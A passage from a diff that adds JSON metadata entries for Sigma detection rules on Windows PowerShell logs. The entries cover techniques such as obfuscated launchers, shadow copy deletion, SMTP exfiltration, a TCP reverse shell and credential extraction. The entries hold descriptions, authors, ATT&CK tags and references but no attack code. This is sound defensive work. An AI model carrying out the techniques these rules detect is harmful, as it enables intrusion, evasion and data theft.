Obfuscated Powershell via RUNDLL LAUNCHER", + "meta": { + "author": "Timur Zinniatullin, oscd.community", + "creation_date": "2020/10/18", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_pm_invoke_obfuscation_via_rundll.yml", + "level": "medium", + "logsource.category": "ps_module", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_invoke_obfuscation_via_rundll.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "a23791fe-8846-485a-b16b-ca691e1b03d4", + "value": "Invoke-Obfuscation RUNDLL LAUNCHER - PowerShell Module" + }, + { + "description": "Detects Obfuscated use of Environment Variables to execute PowerShell", + "meta": { + "author": "Jonathan Cheong, oscd.community", + "creation_date": "2020/10/15", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_pm_invoke_obfuscation_var.yml", + "level": "high", + "logsource.category": "ps_module", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_invoke_obfuscation_var.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "6bfb8fa7-b2e7-4f6c-8d9d-824e5d06ea9e", + "value": "Invoke-Obfuscation VAR+ Launcher - PowerShell Module" + }, + { + "description": "Detects suspicious PowerShell invocation command parameters", + "meta": { + "author": "Florian Roth (rule), Jonhnathan Ribeiro", + "creation_date": "2017/03/05", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_pm_susp_invocation_specific.yml", + "level": "high", + "logsource.category": "ps_module", + "logsource.product": "windows", + "refs": [ + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_susp_invocation_specific.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "8ff28fdd-e2fa-4dfa-aeda-ef3d61c62090", + "value": "Suspicious PowerShell Invocations - Specific - PowerShell Module" + }, + { + "description": "The Reset-ComputerMachinePassword cmdlet changes the computer account password that the computers use to authenticate to the domain controllers in the domain.\nYou can use it to reset the password of the local computer.\n", + "meta": { + "author": "frack113", + "creation_date": "2022/02/21", + "falsepositive": [ + "Administrator PowerShell scripts" + ], + "filename": "posh_pm_susp_reset_computermachinepassword.yml", + "level": "medium", + "logsource.category": "ps_module", + "logsource.product": "windows", + "refs": [ + "https://thedfirreport.com/2022/02/21/qbot-and-zerologon-lead-to-full-domain-compromise/", + "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/reset-computermachinepassword?view=powershell-5.1", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_susp_reset_computermachinepassword.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1078" + ] + }, + "uuid": "e3818659-5016-4811-a73c-dde4679169d2", + "value": "Suspicious Computer Machine Password by PowerShell" + }, + { + "description": "RemoteFXvGPUDisablement.exe is an abusable, signed PowerShell host executable that was introduced in Windows 10 and Server 2019 (OS Build 17763.1339).", + "meta": { + "author": "frack113", + "creation_date": "2021/07/13", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_pm_susp_athremotefxvgpudisablementcommand.yml", + "level": "medium", + "logsource.category": "ps_module", + "logsource.product": "windows", + "refs": [ + 
"https://github.com/redcanaryco/AtomicTestHarnesses/blob/7e1e4da116801e3d6fcc6bedb207064577e40572/TestHarnesses/T1218_SignedBinaryProxyExecution/InvokeRemoteFXvGPUDisablementCommand.ps1", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_susp_athremotefxvgpudisablementcommand.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218" + ] + }, + "uuid": "38a7625e-b2cb-485d-b83d-aff137d859f4", + "value": "Abusable Invoke-ATHRemoteFXvGPUDisablementCommand - PowerShell Module" + }, + { + "description": "Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network.", + "meta": { + "author": "frack113", + "creation_date": "2021/12/10", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_pm_susp_get_nettcpconnection.yml", + "level": "low", + "logsource.category": "ps_module", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1049/T1049.md#atomic-test-2---system-network-connections-discovery-with-powershell", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_susp_get_nettcpconnection.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1049" + ] + }, + "uuid": "aff815cc-e400-4bf0-a47a-5d8a2407d4e1", + "value": "Use Get-NetTCPConnection - PowerShell Module" + }, + { + "description": "Detects Obfuscated Powershell via use Rundll32 in Scripts", + "meta": { + "author": "Nikita Nazarov, oscd.community", + "creation_date": "2019/10/08", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_pm_invoke_obfuscation_via_use_rundll32.yml", + "level": "high", + "logsource.category": "ps_module", + "logsource.product": 
"windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_invoke_obfuscation_via_use_rundll32.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "88a22f69-62f9-4b8a-aa00-6b0212f2f05a", + "value": "Invoke-Obfuscation Via Use Rundll32 - PowerShell Module" + }, + { + "description": "Use living off the land tools to zip a file and stage it in the Windows temporary folder for later exfiltration", + "meta": { + "author": "frack113", + "creation_date": "2021/07/20", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_pm_susp_zip_compress.yml", + "level": "medium", + "logsource.category": "ps_module", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1074.001/T1074.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_susp_zip_compress.yml" + ], + "tags": [ + "attack.collection", + "attack.t1074.001" + ] + }, + "uuid": "daf7eb81-35fd-410d-9d7a-657837e602bb", + "value": "Zip A Folder With PowerShell For Staging In Temp - PowerShell Module" + }, + { + "description": "Adversaries may communicate using application layer protocols associated with web traffic to avoid detection/network filtering by blending in with existing traffic.\nCommands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.\n", + "meta": { + "author": "frack113", + "creation_date": "2022/01/23", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_susp_invoke_webrequest_useragent.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + 
"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1071.001/T1071.001.md#t1071001---web-protocols", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_invoke_webrequest_useragent.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1071.001" + ] + }, + "uuid": "d4488827-73af-4f8d-9244-7b7662ef046e", + "value": "Change User Agents with WebRequest" + }, + { + "description": "Detects TOKEN OBFUSCATION technique from Invoke-Obfuscation", + "meta": { + "author": "frack113", + "creation_date": "2022/12/27", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_token_obfuscation.yml", + "level": "high", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/danielbohannon/Invoke-Obfuscation", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_token_obfuscation.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027.009" + ] + }, + "uuid": "f3a98ce4-6164-4dd4-867c-4d83de7eca51", + "value": "Powershell Token Obfuscation - Powershell" + }, + { + "description": "The infrastructure for management data and operations that enables local and remote management of Windows personal computers and servers", + "meta": { + "author": "frack113", + "creation_date": "2022/01/12", + "falsepositive": [ + "Legitimate PowerShell scripts" + ], + "filename": "posh_ps_susp_gwmi.yml", + "level": "low", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/get-wmiobject?view=powershell-5.1&viewFallbackFrom=powershell-7", + "https://attack.mitre.org/datasources/DS0005/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_gwmi.yml" ], "tags": [ "attack.persistence", + "attack.t1546" + ] + }, + "uuid": 
"0332a266-b584-47b4-933d-a00b103e1b37", + "value": "Suspicious Get-WmiObject" + }, + { + "description": "Detects the use of various web request commands with commandline tools and Windows PowerShell cmdlets (including aliases) via PowerShell logs", + "meta": { + "author": "James Pemberton / @4A616D6573", + "creation_date": "2019/10/24", + "falsepositive": [ + "Use of Get-Command and Get-Help modules to reference Invoke-WebRequest and Start-BitsTransfer." + ], + "filename": "posh_ps_web_request_cmd_and_cmdlets.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://blog.jourdant.me/post/3-ways-to-download-files-with-powershell", + "https://4sysops.com/archives/use-powershell-to-download-a-file-with-http-https-and-ftp/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_web_request_cmd_and_cmdlets.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "1139d2e2-84b1-4226-b445-354492eba8ba", + "value": "Usage Of Web Request Commands And Cmdlets - PowerShell" + }, + { + "description": "Uses PowerShell to install/copy a a file into a system directory such as \"System32\" or \"SysWOW64\"", + "meta": { + "author": "frack113, Nasreddine Bencherchali", + "creation_date": "2021/12/27", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_copy_item_system_directory.yml", + "level": "high", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1556.002/T1556.002.md#atomic-test-1---install-and-register-password-filter-dll", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_copy_item_system_directory.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1556.002" + ] + }, + "uuid": "63bf8794-9917-45bc-88dd-e1b5abc0ecfd", + "value": 
"Powershell Install a DLL in System Directory" + }, + { + "description": "Detects the execution of an MSI file using PowerShell and the WMI Win32_Product class", + "meta": { + "author": "frack113", + "creation_date": "2022/04/24", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_win32_product_install_msi.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.007/T1218.007.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_win32_product_install_msi.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218.007" + ] + }, + "uuid": "91109523-17f0-4248-a800-f81d9e7c081d", + "value": "PowerShell WMI Win32_Product Install MSI" + }, + { + "description": "Detects Obfuscated use of stdin to execute PowerShell", + "meta": { + "author": "Jonathan Cheong, oscd.community", + "creation_date": "2020/10/15", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_invoke_obfuscation_stdin.yml", + "level": "high", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_invoke_obfuscation_stdin.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "779c8c12-0eb1-11eb-adc1-0242ac120002", + "value": "Invoke-Obfuscation STDIN+ Launcher - Powershell" + }, + { + "description": "Adversaries may abuse PowerShell commands and scripts for execution.\nPowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system\n", + "meta": { + "author": "frack113", + "creation_date": "2022/01/06", + "falsepositive": [ + "Legitimate administrative script" + ], 
+ "filename": "posh_ps_remote_session_creation.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1059.001/T1059.001.md#atomic-test-10---powershell-invoke-downloadcradle", + "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/new-pssession?view=powershell-7.2", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_remote_session_creation.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "a0edd39f-a0c6-4c17-8141-261f958e8d8f", + "value": "PowerShell Remote Session Creation" + }, + { + "description": "Adversaries may search local file systems and remote file shares for files containing insecurely stored credentials.\nThese can be files created by users to store their own credentials, shared credential stores for a group of individuals,\nconfiguration files containing passwords for a system or service, or source code/binary files containing embedded passwords.\n", + "meta": { + "author": "frack113", + "creation_date": "2021/12/19", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_susp_extracting.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.001/T1552.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_extracting.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1552.001" + ] + }, + "uuid": "bd5971a7-626d-46ab-8176-ed643f694f68", + "value": "Extracting Information with PowerShell" + }, + { + "description": "Deletes Windows Volume Shadow Copies with PowerShell code and Get-WMIObject. 
This technique is used by numerous ransomware families such as Sodinokibi/REvil", + "meta": { + "author": "frack113", + "creation_date": "2021/12/26", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_susp_win32_shadowcopy.yml", + "level": "high", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md#atomic-test-5---windows---delete-volume-shadow-copies-via-wmi-with-powershell", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_win32_shadowcopy.yml" + ], + "tags": [ + "attack.impact", + "attack.t1490" + ] + }, + "uuid": "e17121b4-ef2a-4418-8a59-12fb1631fa9e", + "value": "Delete Volume Shadow Copies via WMI with PowerShell - PS Script" + }, + { + "description": "Adversaries may use hidden windows to conceal malicious activity from the plain sight of users.\nIn some cases, windows that would typically be displayed when an application carries out an operation can be hidden\n", + "meta": { + "author": "frack113, Tim Shelton (fp AWS)", + "creation_date": "2021/10/20", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_susp_windowstyle.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.003/T1564.003.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_windowstyle.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1564.003" + ] + }, + "uuid": "313fbb0a-a341-4682-848d-6d6f8c4fab7c", + "value": "Suspicious PowerShell WindowStyle Option" + }, + { + "description": "Adversaries may abuse PowerShell commands and scripts for execution.\nPowerShell is a powerful interactive command-line interface and scripting environment included 
in the Windows operating system. (Citation: TechNet PowerShell)\nAdversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code\n", + "meta": { + "author": "frack113, MatilJ", + "creation_date": "2022/01/19", + "falsepositive": [ + "Legitimate administrative script" + ], + "filename": "posh_ps_msxml_com.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/previous-versions/windows/desktop/ms766431(v=vs.85)", + "https://www.trendmicro.com/en_id/research/22/e/uncovering-a-kingminer-botnet-attack-using-trend-micro-managed-x.html", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1059.001/T1059.001.md#atomic-test-7---powershell-msxml-com-object---with-prompt", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_msxml_com.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "78aa1347-1517-4454-9982-b338d6df8343", + "value": "Powershell MsXml COM Object" + }, + { + "description": "Adversaries may employ various system checks to detect and avoid virtualization and analysis environments.\nThis may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox\n", + "meta": { + "author": "frack113, Duc.Le-GTSC", + "creation_date": "2021/08/03", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_detect_vm_env.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1497.001/T1497.001.md", + "https://techgenix.com/malicious-powershell-scripts-evade-detection/", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_detect_vm_env.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1497.001" + ] + }, + "uuid": "d93129cd-1ee0-479f-bc03-ca6f129882e3", + "value": "Powershell Detect Virtualization Environment" + }, + { + "description": "Detects Obfuscated Powershell via COMPRESS OBFUSCATION", + "meta": { + "author": "Timur Zinniatullin, oscd.community", + "creation_date": "2020/10/18", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_invoke_obfuscation_via_compress.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_invoke_obfuscation_via_compress.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "20e5497e-331c-4cd5-8d36-935f6e2a9a07", + "value": "Invoke-Obfuscation COMPRESS OBFUSCATION - PowerShell" + }, + { + "description": "Detects Commandlet names from PowerView of PowerSploit exploitation framework.", + "meta": { + "author": "Bhabesh Raj", + "creation_date": "2021/05/18", + "falsepositive": [ + "Should not be any as administrators do not use this tool" + ], + "filename": "posh_ps_powerview_malicious_commandlets.yml", + "level": "high", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://thedfirreport.com/2020/10/08/ryuks-return", + "https://github.com/PowerShellMafia/PowerSploit/tree/master/Recon", + "https://powersploit.readthedocs.io/en/stable/Recon/README", + "https://adsecurity.org/?p=2277", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_powerview_malicious_commandlets.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": 
"dcd74b95-3f36-4ed9-9598-0490951643aa", + "value": "Malicious PowerView PowerShell Commandlets" + }, + { + "description": "Detects creation of a local user via PowerShell", + "meta": { + "author": "@ROxPinTeddy", + "creation_date": "2020/04/11", + "falsepositive": [ + "Legitimate user creation" + ], + "filename": "posh_ps_create_local_user.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1136.001/T1136.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_create_local_user.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001", + "attack.persistence", + "attack.t1136.001" + ] + }, + "uuid": "243de76f-4725-4f2e-8225-a8a69b15ad61", + "value": "PowerShell Create Local User" + }, + { + "description": "Detects Execution via SyncInvoke in CL_Invocation.ps1 module", + "meta": { + "author": "oscd.community, Natalia Shornikova", + "creation_date": "2020/10/14", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_cl_invocation_lolscript.yml", + "level": "high", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/bohops/status/948061991012327424", + "https://lolbas-project.github.io/lolbas/Scripts/Cl_invocation/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_cl_invocation_lolscript.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1216" + ] + }, + "uuid": "4cd29327-685a-460e-9dac-c3ab96e549dc", + "value": "Execution via CL_Invocation.ps1 - Powershell" + }, + { + "description": "Detects the use of PSAsyncShell an Asynchronous TCP Reverse Shell written in powershell", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/10/04", + "falsepositive": [ + "Unlikely" + ], + "filename": 
"posh_ps_psasyncshell.yml", + "level": "high", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/JoelGMSec/PSAsyncShell", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_psasyncshell.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "afd3df04-948d-46f6-ae44-25966c44b97f", + "value": "PSAsyncShell - Asynchronous TCP Reverse Shell" + }, + { + "description": "Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel.\nThe data may also be sent to an alternate network location from the main command and control server.\n", + "meta": { + "author": "frack113", + "creation_date": "2022/09/26", + "falsepositive": [ + "Legitimate script" + ], + "filename": "posh_ps_send_mailmessage.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1048.003/T1048.003.md#atomic-test-5---exfiltration-over-alternative-protocol---smtp", + "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.utility/send-mailmessage?view=powershell-7.2", + "https://www.ietf.org/rfc/rfc2821.txt", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_send_mailmessage.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.t1048.003" + ] + }, + "uuid": "9a7afa56-4762-43eb-807d-c3dc9ffe211b", + "value": "Powershell Exfiltration Over SMTP" + }, + { + "description": "Detects usage of the Get-ADComputer cmdlet to collect computer information and output it to a file", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/11/17", + "falsepositive": [ + "Legitimate admin scripts may use the same technique, it's better to exclude specific computers or 
users who execute these commands or scripts often" + ], + "filename": "posh_ps_computer_discovery_get_adcomputer.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://www.cisa.gov/uscert/sites/default/files/publications/aa22-320a_joint_csa_iranian_government-sponsored_apt_actors_compromise_federal%20network_deploy_crypto%20miner_credential_harvester.pdf", + "https://www.microsoft.com/en-us/security/blog/2022/10/18/defenders-beware-a-case-for-post-ransomware-investigations/", + "http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_computer_discovery_get_adcomputer.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1033" + ] + }, + "uuid": "db885529-903f-4c5d-9864-28fe199e6370", + "value": "Computer Discovery And Export Via Get-ADComputer Cmdlet - PowerShell" + }, + { + "description": "Detects usage of the \"Set-Service\" powershell cmdlet to configure a new SecurityDescriptor that allows a service to be hidden from other utilities such as \"sc.exe\", \"Get-Service\"...etc. 
(Works only in powershell 7)", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/10/17", + "falsepositive": [ + "Rare intended use of hidden services", + "Rare FP could occure due to the non linearity of the ScriptBlockText log" + ], + "filename": "posh_ps_using_set_service_to_hide_services.yml", + "level": "high", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.management/set-service?view=powershell-7.2", + "https://twitter.com/Alh4zr3d/status/1580925761996828672", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_using_set_service_to_hide_services.yml" + ], + "tags": [ + "attack.persistence", + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1574.011" + ] + }, + "uuid": "953945c5-22fe-4a92-9f8a-a9edc1e522da", + "value": "Abuse of Service Permissions to Hide Services Via Set-Service - PS" + }, + { + "description": "Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system.\nAdversaries may use the information from [File and Directory Discovery](https://attack.mitre.org/techniques/T1083) during automated discovery to shape follow-on behaviors,\nincluding whether or not the adversary fully infects the target and/or attempts specific actions.\n", + "meta": { + "author": "frack113", + "creation_date": "2021/12/15", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_file_and_directory_discovery.yml", + "level": "low", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1083/T1083.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_file_and_directory_discovery.yml" + ], + 
"tags": [ + "attack.discovery", + "attack.t1083" + ] + }, + "uuid": "d23f2ba5-9da0-4463-8908-8ee47f614bb9", + "value": "Powershell File and Directory Discovery" + }, + { + "description": "Detects suspicious PowerShell invocation command parameters", + "meta": { + "author": "Florian Roth (rule)", + "creation_date": "2017/03/12", + "falsepositive": [ + "Very special / sneaky PowerShell scripts" + ], + "filename": "posh_ps_susp_invocation_generic.yml", + "level": "high", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_invocation_generic.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "ed965133-513f-41d9-a441-e38076a0798f", + "value": "Suspicious PowerShell Invocations - Generic" + }, + { + "description": "Detects SyncAppvPublishingServer process execution which usually utilized by adversaries to bypass PowerShell execution restrictions.", + "meta": { + "author": "Ensar Şamil, @sblmsrsn, OSCD Community", + "creation_date": "2020/10/05", + "falsepositive": [ + "App-V clients" + ], + "filename": "posh_ps_syncappvpublishingserver_exe.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Syncappvpublishingserver/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_syncappvpublishingserver_exe.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218" + ] + }, + "uuid": "dddfebae-c46f-439c-af7a-fdb6bde90218", + "value": "SyncAppvPublishingServer Execution to Bypass Powershell Restriction" + }, + { + "description": "Once established within a system or network, an adversary may use automated techniques for collecting internal data.", + "meta": { + "author": "frack113", + "creation_date": "2021/07/28", + "falsepositive": [ + "Unknown" + ], + 
"filename": "posh_ps_automated_collection.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1119/T1119.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_automated_collection.yml" + ], + "tags": [ + "attack.collection", + "attack.t1119" + ] + }, + "uuid": "c1dda054-d638-4c16-afc8-53e007f3fbc5", + "value": "Automated Collection Command PowerShell" + }, + { + "description": "Detects when a user disables the Windows Firewall via a Profile to help evade defense.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/10/12", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_windows_firewall_profile_disabled.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://www.tutorialspoint.com/how-to-get-windows-firewall-profile-settings-using-powershell", + "https://docs.microsoft.com/en-us/powershell/module/netsecurity/set-netfirewallprofile?view=windowsserver2019-ps", + "https://www.elastic.co/guide/en/security/current/windows-firewall-disabled-via-powershell.html", + "http://woshub.com/manage-windows-firewall-powershell/", + "http://powershellhelp.space/commands/set-netfirewallrule-psv5.php", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_windows_firewall_profile_disabled.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.004" + ] + }, + "uuid": "488b44e7-3781-4a71-888d-c95abfacf44d", + "value": "Windows Firewall Profile Disabled" + }, + { + "description": "Adversaries may create a domain account to maintain access to victim systems.\nDomain accounts are those managed by Active Directory Domain Services where access and permissions are configured across systems and services that are part of 
